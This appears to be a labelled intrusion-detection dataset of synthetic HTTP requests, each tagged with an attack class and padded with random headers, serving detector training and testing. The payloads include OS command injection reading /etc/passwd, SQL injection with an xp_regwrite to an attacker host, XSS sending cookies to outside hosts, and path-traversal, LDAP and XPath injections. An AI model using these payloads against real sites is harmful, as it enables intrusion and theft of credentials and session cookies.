Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic bTlhdGE6bXphbQ==
Range: 7-
Referer: http://tnaticc.de/EdaecH2.mpg
TE: trailers,gzip;q=0.1,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 8.1; nt-es; rv:7.9.2) Gecko/91149562
UA-CPU: Sparc
UA-Disp: 807,3254,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: FTP/8.2 www.bsoflia.jpg, 5.4 www.eeags.png
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38765
Start - Id: 44551
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.0
Host: 36.89.212.104:0433
Connection: close
Accept: application/postscript;q=0.4, text/plain;q=0.1
Accept-Charset: x-mac-arabic, x-mac-ce, cp-932, koi8-r;q=0.5
Accept-Encoding: 
Accept-Language: qbntcceS-f, Se7lh-7mM, l-oEot;q=0.9, pG0qiE-ellltelo;q=0.4
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="7"
Date: Sun, 09 Apr 06 17:01:56 CET
ETag: "EEPOju4kAj9ks_MIv"
Expect: etsb1rf=swx0Pizc;eneui
From: tzi1ete@elNpu.cz
If-Modified-Since: Mon, 28 Dec 09 23:50:38 UTC
If-Unmodified-Since: Mon, 20 Aug 07 04:47:23 UTC
If-Match: "JYZEs@uQtoT38q9rf11B"
If-None-Match: "Rac20ZHVWp9u2Qyv41F"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 9997
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: tttq amii=me2Eecta
Authorization: Basic dXZ1b2FlcmE6b2lpaHRlZXQ=
Range: -06354,383-6635,26244-
Referer: /ipuae/cogo/eapD.php4
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: aleuttvniheaWgS
UA-CPU: Sparc
UA-Pixels: 685x9987
Via: HTTP/0.7 www.momr.css:61, 5.6 218.229.183.108, 1.1 105.181.169.26:823
Transfer-Encoding: deflate
Warning: 647 www.OdtcirTi.shtml "hsqmvKttea7a" 
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44551
Start - Id: 35486
class: XPathInjection
GET /eUepnuGy4ywiIt10g.tiff? HTTP/1.1
Host: 70.139.72.151
Connection: close
Accept: video/mpeg, text/html
Accept-Charset: windows-1258;q=0.7, isiri-3342;q=0.4
Accept-Encoding: compress;q=0.6, compress;q=0.1
Accept-Language: *;q=0.5
Cache-Control: min-fresh=581
Client-ip: 188.0.226.122
Cookie: rSfSb=dcEipDq
Date: Fri, 20 Jan 06 05:42:40 GMT
If-Range: Fri, 29 May 09 10:30:50 UTC
Max-Forwards: 8367
Referer: /rE4mt/ishwuwfr.nsf
TE: chunked,trailers,trailers
User-Agent: 8542    or    count(path/child::node()[position()=((i+j+k+l+1)]     |    path/child::*()[position()=(k+1)])=1 or   53758=
Transfer-Encoding: bRn7eo; gifha=ei0mg4

null

End - Id: 35486
Start - Id: 35402
class: SqlInjection
GET /touc7ajq9L_mcdGrA4.shtml?s5mtt4cS5r=tbkopye9c&seoEQnntr=4949556&@S-Jk17r@Rftp=aDPFJzcNN8&Eunai0du4nu1gt=183441&shutdownAm2document=ut%5Dro&nuandn2l=909010&foIodtatif5=if&snL9sdttHost=hwCt%27+UNION+++%2F**%2F+++++SELECT+2abi1tye+++++FROM+++++dba_users+++++WHERE++++wia+++++like+++%27%2525&Efiohr8ztisl=i4%40RdgNjM&donmt3wi35eZ9fd=fiJ1XuhA3CI.&re4Newi0xraSj=d&e6s=y1M3tcme HTTP/1.1
Host: www.olGs.biz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: stTr1i='C'
Client-ip: 145.236.174.245
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="091"
Date: Wed, 16 Aug 06 11:50:04 GMT
ETag: "w.bssa@znOLYSv9"
Expect: aeuor=cxtirylr
From: nceooR@ecnsnwaoq4.de
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: "-ViWE2F@R5iv_Zk5ALy"
If-Range: Fri, 23 Jun 06 24:35:55 CET
Max-Forwards: 766
MIME-Version: 4.3
Pragma: gtwd0ndm='wnIIrakv'
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: NTLM cndvc3RvZWJHZXNmZTU4cmJXaWRvYlNhaWFlMGdlZGk0UnVuNHA=
Range: -67
Referer: /t78e2u/e54eeue.cgi
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: dtlrltdg
UA-CPU: 68000
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 9.4 www.aee3.css, soDen/3.5 www.mtthra.png
Transfer-Encoding: sawwG; rPdgyO=te8eIg
Upgrade: to9t/2.8, 4Egiin/1.2, doaAoo/6.7, Tuann/2.6
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35402
Start - Id: 47290
class: XSS
GET /mnitzeuD/uByoihY.php?oeIo8erTsH=optiReyweateo%24r%3F&ioiie=58&xZ6xtW=5746688&statosbtogifimE=004&oowtoor=%3Ca+href++++%3D+%22++++about%3A%3Cs%26%2399%3Bript+++%3E%5Bwindow.open%28%27http%3A%2F%2F157.45.235.248%2Ferrond.asmx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E++++%22%3E&jap6o=332428&mhbesdsi=64106&g0sE=9AEI&-kqhtM8=rS%5DsHmcefsase&JTNjd=klagr&escm0eumrx=anrtt5reo9n&oeeoaD=lta0a%2Busra%5Ba&o3iulsieArrLqE=225&RsQetciarraa0v=22 HTTP/1.1
Host: 89.9.229.189
Connection: wbeetN
Accept: audio/basic, video/mpeg;q=0.4
Accept-Charset: isiri-3342;q=0.1, windows-1254, windows-1251;q=0.1, x-mac-arabic, euc-jp
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 156.129.47.155
Cookie: mpetoor=2513160;soceUimnaiaamc=es~ea;rtd1avgE=Hhn5nme13s
Cookie2: $Version="2"
Date: Mon, 08 Nov 04 11:41:12 UTC
ETag: W/"Jj1djgJNibVZPR0W8"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Thu, 04 Sep 08 21:09:08 GMT
If-Unmodified-Since: Sun, 07 Dec 08 11:56:45 UTC
If-Match: *
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Thu, 18 May 06 01:02:06 GMT
Max-Forwards: 7
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic d2VheToxTGVmZQ==
Range: -4,7256-5,39-5314
Referer: /ec2ail.php3
TE: gzip
Trailer: Accept-Encoding
User-Agent: 63SbUKX2ix http://www.dtcv.cz
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 979x278
Via: 8.4 1.193.28.125, 0.1 www.0gifk.png, 7.3 213.142.247.219
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 269675731221597037
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 47290
Start - Id: 47556
class: XSS
GET /eEfjep/eHxV8cM8/o5gutTsE62l0O/atefEtcnsrnnexa/PJ6cTR8E9v0-p/trYjOnbNmu7tedinl9a/m44O/Tu.cgi?oma=%3C%21%5BCDATA%5B%3C%21--%5D%5D++%3E%3Cscript+%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.atte.com%2Fcgi-bin%2Fatenolarel.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&1si4r8rutozHLe=3mP%25a+r&iot=4417&gv3_xJmWi=563019&B1hrMie1eC=doqg7h%2F&rki2snoZy5=s5puaiettoeedWeba&2inEpvYaeyrc=83973342&usNwo2nqpBopb=-%5Cs&ularta3ah=bom&9a3FMccq=etgckhett HTTP/1.0
Host: 94.148.84.209
Connection: close
Accept: application/postscript, application/*, text/xml
Accept-Charset: x-mac-greek;q=0.3, iso-8859-8-i;q=0.8, x-mac-greek;q=0.0, iso-8859-2, cp-936;q=0.3
Accept-Encoding: 
Accept-Language: v-ewtPpa;q=0.9, 3s-OaxIjti, tocoas-fw
Cache-Control: nx='ord'
Client-ip: 113.227.139.221
Cookie: de9ar=6421;penssaerrnYa=(rn;b_HJ9QIlnCh=iwD_R;ewD=ee ;trhseuntarjtev=eWn
Cookie2: $Version="143"
Date: Mon, 23 Jan 06 22:46:08 GMT
ETag: "ZfTviux_Ctk_FaI1Yr7D"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Wed, 26 Nov 08 13:46:41 UTC
If-Unmodified-Since: Thu, 16 Mar 06 11:21:07 CET
If-Match: *
If-None-Match: "qTkrEdgRX.XPC@P"
If-Range: "Xe2A6tJERJOA6JEgOsv"
Max-Forwards: 2
MIME-Version: 3.1
Pragma: nloon='ehevs'
Proxy-Authorization: ppaz adeo=ssbniBo
Authorization: Basic c3J3bDJ5Ond0YWll
Range: 946-214738,54330-8
Referer: /rairgt.msf
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: enssoEp23ot5ds4yai1
UA-CPU: x86
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: HTTP/8.9 84.234.127.185, 6.5 228.22.14.50, FTP/5.2 www.eestafif.html
Transfer-Encoding: ah1woi; Eerp=bRmth
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 112.140.177.233
X-Serial-Number: 57604389
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47556
Start - Id: 38429
class: LdapInjection
GET /es.html?ipmnsia0N=E&an4oheefiket9fe=o__&he=%29+++%28+%7C+++%28+++cn%3D*o++%27brien*++%29%28mail++++%3D*o++++%27brien*%29+++&8utaeacnf4iaevi=tqIdf&et26Dottosd=0317214&eHn2dS0iobnxdb=84212&ms8tnlaemkliteh=wctab&odmdheh1e0lw=d+&sri1a=qlinkitialtr&hordecean=20&o5TYGOyMT=252918&ieniRsedtsHe=%3D+sie&oenrcToTobw=eye&eu=OgdOodOthau HTTP/1.0
Host: 99.42.81.129
Connection: Ecilrew
Accept: application/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 174.114.246.188
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Thu, 13 Jan 05 15:10:03 GMT
ETag: "caysJ7Ou24aNUTvQ"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Sun, 07 Mar 04 22:56:58 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2717
MIME-Version: 3.3
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest opaque="iicoh"
Range: -03,38-
Referer: http://tsbwstc.net/jpstevee/e8oa.swf
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (X11; U; Open BSD i386 6.0; et-rE; rv:2.4.7) Gecko/28265448
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38429
Start - Id: 47125
class: XSS
GET /p-zj6@eTDZ01N6wEI/aiieaosoEehsCmhe/Vtc9/IytmpOY6bloFiadminRC/Ykr-eSJadEdcx7/iyoqOFji/heVh08POoO9P/5zJ6aPf8AR_mHsbaVC6/@mY/e4.jpeg?ordudoT9lweohb=eet&union.@kQZjI=%3Cdiv++++style++%3D+%22behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.chll.com%2Fscript%2Ftan5.nsf%5D%29%3B+++%22++%3E&cenaa9coE2tra=sex+l+v4mi&cyhhovrenstoia=en&sxs=tnlehaving+2d%27%3C%40oDt+&rao=3535425 HTTP/1.0
Host: 14.38.254.69:146
Connection: close
Accept: */*;q=0.7
Accept-Charset: us-ascii, iso-8859-15, iso-8859-1;q=0.1, iso-8859-1;q=0.1
Accept-Encoding: compress;q=0.1, deflate
Accept-Language: *;q=0.9
Cache-Control: max-age=6
Client-ip: 111.27.185.154
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="5"
Date: Sun, 28 Jan 07 05:58:58 UTC
ETag: "mQNu2WqrXNJIUGh7"
Expect: sra9A=H3ma;sioief8
From: dy0mird@eelb.it
If-Modified-Since: Fri, 23 Feb 07 16:56:02 CET
If-Unmodified-Since: Mon, 21 Aug 06 01:21:22 CET
If-Match: "qqyGfsx.zGKl71-SzEs9"
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 838
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: Digest realm
Range: 38-13,-4
Referer: /nyanjdya/sxnnco11.mpg
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/2.0 (X11; U; Solaris 9.1; ww-ci; rv:6.0.3) Gecko/89018339
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: deflate
Upgrade: suae0/1.2
Warning: 236 www.awsdo.css "gdocuisscirL" "Fri, 28 Dec 07 18:21:26 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47125
Start - Id: 45517
class: PathTransversal
GET /oomlkfB30oaj_7GW80a/ygi2eval/purKQnv/tZ-9rWxxx3XyyLOh/ag@pzgX@.@YHriK/Nfi1e/ZwinntVZsB9aICR%u9C/kat5/2en0iOsCjQUX/5aA/lzdketomcu.html?MOZinqY=y8httpsao&avhio=Rt7eFaa9owAaoasol&9lgecw=%5CWINNT%5Csystem.ini&oe5bpl8idhr=i+p&@.eHLzbG98G1=nSy_QZlk6 HTTP/1.1
Host: 111.193.147.61:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-japanese;q=0.6
Accept-Encoding: 
Accept-Language: 8Thne-4se
Cache-Control: no-transform
Client-ip: 247.212.53.148
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="37"
Date: Thu, 14 Feb 08 05:27:14 GMT
ETag: "cLx8FTIZFHq_bQt6l"
Expect: 100-continue
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Sat, 03 May 08 11:45:45 UTC
If-Unmodified-Since: Fri, 18 Jan 08 17:42:17 GMT
If-Match: *
If-None-Match: "TFUv-j6qTJzVC7.R"
If-Range: *
Max-Forwards: 12
MIME-Version: 8.4
Pragma: nO='aegsLE'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /ao3hsan/nOoR8/asaMrht/ajnvtld.ace
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 8.3; iq-wh; rv:2.1.2) Gecko/80940441
UA-CPU: 68000
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: FTP/3.0 www.LeraSla.css
Transfer-Encoding: compress
Upgrade: sJn/9.5, owof/5.6, ooi/5.8, beto/7.5
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45517
Start - Id: 46345
class: PathTransversal
GET /SaPM/plknuInOlsltnnjen/tvetd0liir1nlc/nb0_HHD4hwp-olTcR/o7g4imjI/ig0W/tsLcoHniyHtT8psda7/4qzi52nAugToauee/uJKKpXwvmq/U-XptYBJBL/9XZoZcKc.asmx?h2e=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: www.nlsynmen.net:80
Connection: sieeheAh
Accept: */*
Accept-Charset: x-mac-turkish, euc-tw, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 51.115.37.124
Cookie2: $Version="19"
Date: Fri, 02 Jan 09 20:13:02 UTC
If-Modified-Since: Wed, 10 Oct 07 03:55:53 CET
If-Match: "1wShDBD3.uZUumC.8f"
If-None-Match: *
If-Range: "bVwlAqYYT8UmE8O1sST"
Max-Forwards: 150
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: /dzaI/alaodt5y/tatashet/kmwod/cbda.msf
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 1.9; dc-oI; rv:9.9.9) Gecko/80678982
UA-Pixels: 648x2225
Via: HTTP/6.5 10.254.153.19
Transfer-Encoding: deflate

null

End - Id: 46345
Start - Id: 37691
class: LdapInjection
POST /t0-nNmrbHXfBw/s1eYxfT_X/mtexWdsKr8toau3isu/3D/ha85Eacwev/gdprorEt/imsreerncewsobae/AipT/x@M/u4o3/Brnfy27tanmha/t.HyMG.UbSR.FGx4.jpeg? HTTP/1.0
Content-Length: 187
Content-Language: wN,iwp3,ut
Content-Encoding: deflate
Content-Location: /linnjaq/ertqe.nsf
Content-MD5: NW9laG91dGlFaW5Fb2Fpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 10:41:37 UTC
Last-Modified: Sun, 02 Mar 08 02:12:41 CET
Host: 100.2.149.19
Connection: close
Accept: audio/*, application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=219
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="3"
Date: Sun, 29 Aug 04 10:22:03 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Wed, 21 Feb 07 03:37:58 CET
If-Unmodified-Since: Tue, 11 Jul 06 03:27:36 UTC
If-Match: "a6LheQf808QtO5v"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: "VzRTpI_OST6L736gzuR"
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 6058-6,88-,-245437
Referer: /zH0ptF/e9Ist0u/NafhA.aspx
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.2 (X11; U; SunOS sun4u 1.6; ax-1T; rv:3.5.8) Gecko/89186644
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.7 www.Ejegowze.js
Transfer-Encoding: identity
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aEoe=edhngisiqamlno&wrawss=2836&OOKDi=")(targetfilter=(o=NetscapeRoot))&dahlohff=:Nt+ninn en5Th8j&IEsrmesiatdR=l&EeAz7etv=eOtal3e&9XcBDNNZ=skbody7:andosock_streamceh

End - Id: 37691
Start - Id: 48636
class: XPathInjection
PUT /2N5@BaNR/Teglaubce4xTepno7e.mspx? HTTP/1.0
Content-Length: 195
Content-Language: ysss,nsxwc
Content-Encoding: deflate
Content-Location: http://www.sSoc.fr/sflsnOP/i1asnrUe/tnoanye/noe33/satufwhO.msf
Content-MD5: bXVvZnV0ZnRMcmVwcWhtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Mar 09 07:58:57 GMT
Last-Modified: Sat, 14 Jul 07 24:13:40 GMT
Host: www.oaer.com
Connection: tdewp
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 145.67.254.44
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="469"
Date: Sat, 18 Apr 09 22:41:25 UTC
ETag: W/"EZ85ec1UkDY_9WvB"
Expect: nIa1=ttl7lssu;IeiaDaia
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Tue, 14 Jun 05 15:59:49 GMT
If-Unmodified-Since: Tue, 18 Mar 08 03:55:22 GMT
If-Match: "glo3tISo0wY7XwiL"
If-None-Match: *
If-Range: Tue, 18 Jul 06 06:34:57 GMT
Max-Forwards: 4
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="39AABfB2d62AF480C2dD2Fe8b3CE4C25"
Authorization: NTLM bG4wYVRycm10cnd0c21lM2dzOHNhbmVpb2F0bXNjbXVy
Range: -046912,8351-4,007308-22
Referer: /nqect/ayts/ine4/ci7p0.php
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: spPei/4.1
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 9.3 165.2.191.108
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kowpS=295   or     count(path/child::node()[position()=((i+j+k+l+1)]   |     path/child::*()[position()=(k+1)])=1     or 634=

End - Id: 48636
Start - Id: 42828
class: OsCommanding
GET /FAs/Nweohd4omoonnn/uUqJ6OjvH1EcaV7Hy_/iH5fgAentad6m/nscieeoiwrp.swf?coAddrsqaee=to&ahoxlledbah=761602&etwirqodrc=7832&apcnr4aeh=556&0mh=%7C+dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&odarLQtocawipoi=859&meytrlnahp=36232&wl=eethtEwwd8r HTTP/1.0
Host: 132.214.132.163:86076
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress, gzip, gzip;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 188.218.7.177
Cookie: ak=Nzbmautoexecb>yc;rtraih7ab=3ttb88n;iesii=amyn611gcg-;Ftvm02aeTfa=eteram
Date: Sun, 11 Jul 04 21:16:19 UTC
From: deCV@nnnan.ch
If-Modified-Since: Tue, 29 May 07 10:25:17 CET
If-Unmodified-Since: Mon, 16 Nov 09 11:20:49 UTC
If-Match: "w8EztbLW-gQt6tO6uey"
If-Range: Sat, 21 Jul 07 21:44:10 GMT
Max-Forwards: 3
MIME-Version: 5.9
Authorization: Basic c3RRbnJzbzppZGxSeDBsWQ==
Referer: http://www.rg9xhrv.biz/dL5mh/dvumnae/4ony0.conf
Trailer: Host
User-Agent: rfot/9.2.8.2
UA-Color: color16
Via: HTTP/6.9 www.oNss.html:3, bte/6.5 168.41.44.75, HTTP/6.2 249.90.77.235
Transfer-Encoding: deflate
Upgrade: bnrh/3.5, tht/4.4, eRslr/7.1, uitl/9.3, nply/0.8
----: -------------------------------------------------

null

End - Id: 42828
Start - Id: 41176
class: SqlInjection
POST /pcgYTIeYGgXVBpzneD/iuwssyfvastfThPemtdc/te/tho5d.png? HTTP/1.0
Content-Length: 51
Content-Language: vnmmEn,pkgr,1Nhsndi
Content-Encoding: gzip
Content-Location: http://5zvR.uk/gyle.pl
Content-Type: application/x-www-form-urlencoded
Host: 241.134.98.99
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cookie: a0icahtMeaiG=cDvz&7usriuK w+ehhe;txihoeuTnrhis=ecoe1ehisitiStq@y;me9=lv;6VscriptVSz=d>o;Fn8Q74@BIFZP=Smtyio8eym;izgt=exec   xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','uegpys','REG_SZ','DBMSSOCN,hackersip,80'
Date: Fri, 03 Mar 06 11:33:28 GMT
Expect: orhuktev=cDh6qt
Referer: http://tiej.gov/u1itbt/TThGjNe/ydAop/1onUme/e9Drirol.mpg
User-Agent: ejHq@O http://www.aqoeta.de
UA-Disp: 854,7910,32
Via: 4.4 131.64.126.82, 2.8 www.7lnrj2pM.jpeg, FTP/6.6 110.52.225.21
Transfer-Encoding: gzip

estjaoesfer=oheng&aost7ymd=mnh+fxmlEneralu t3<h

End - Id: 41176
Start - Id: 50098
class: XPathInjection
PUT /euPmVH8iQtRijW/fr2d/hi6NBDATxKKJMoT/aentytam9hi1ocn/ygpot/cYuR.KFtF0mTe.js? HTTP/1.0
Content-Length: 228
Content-Language: nwhiTi5n
Content-Encoding: deflate
Content-Location: http://l0srltex.cz/cegue.php
Content-MD5: b2VyZWNtbWV1dG5taHRtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Feb 10 18:54:43 UTC
Last-Modified: Tue, 07 Sep 04 22:35:47 UTC
Host: 42.177.34.160
Connection: keep-alive
Accept: text/xml;q=0.5, image/*;q=0.0, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: uh-eaw8oIns, dlLt-Erctvsnt, syihn-auaec8hj;q=0.2, ntoeav1-ruU9ee, Nrt-hre5
Cache-Control: min-fresh=05458
Client-ip: 190.90.78.212
Cookie: wdavg0=9wo;z5dico1uu=sGqHc0 oahdpha;nenpu=14  or  ptr/Is/ge/child::node()[position()=9]  or 2=;erdpjyoaat=22772057;osien1di=wissea2
Cookie2: $Version="68"
Date: Mon, 23 May 05 12:16:59 CET
ETag: W/"oVGxOXRSDXIVS2DmUS"
Expect: cnimr
From: sg4eHiz@plotai.gov
If-Modified-Since: Wed, 13 Apr 05 13:51:13 UTC
If-Unmodified-Since: Wed, 12 Oct 05 01:41:59 GMT
If-Match: *
If-None-Match: "Vlyqvic454zroln_qb"
If-Range: Mon, 07 Jun 04 05:40:07 GMT
Max-Forwards: 8
MIME-Version: 7.3
Pragma: ntI='dtouc2y'
Proxy-Authorization: NTLM aWRpc0hhbk9uZWRkcGllZXNpUmY1YWxrYW9pb2RNdGRzbXNvZUhjeWV0RHRlZUM=
Authorization: NTLM bHR0ZVJlT2V5c2VlWm91aXd5MXQ5MWRCbkFzNGNvb2NubWJleWhlRmlwc3Nh
Range: 008671-6,910042-
Referer: /NfawLz/ekhV3ahe/c6ca.msf
TE: chunked;q=0.2,deflate;q=0.3
Trailer: Range
User-Agent: Mozilla/5.4 (X11; U; Linux i386 7.5; qm-ra; rv:8.6.8) Gecko/92601677
UA-Color: color32
Via: HTTP/8.1 www.etnxe.gif
Transfer-Encoding: deflate
Upgrade: tnneIh/3.3, sWf/3.2, dt7pet/7.2, mAzn/5.8
Warning: 896 106.250.253.174:22645 "rcMtty2tHhte5thfEiSt" "Thu, 13 May 04 23:52:35 UTC"
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3a4heRhia5=v--1_&ieyesrternibpE=72&mfr6wlhopTrtaso=nctchiwis&at7tthjfqoe=4uieb&eeCbikrrr0nei=xG@dwpiLz_&dneEkcO=xiT73dO&sst4sednoani=Hnm&iupt=jslhnfooammedn5W&Ufmrlaf=r0d&WnI-R=ehinnayiwoe1ualh1b&c._p= p&idntelnetposition0=003

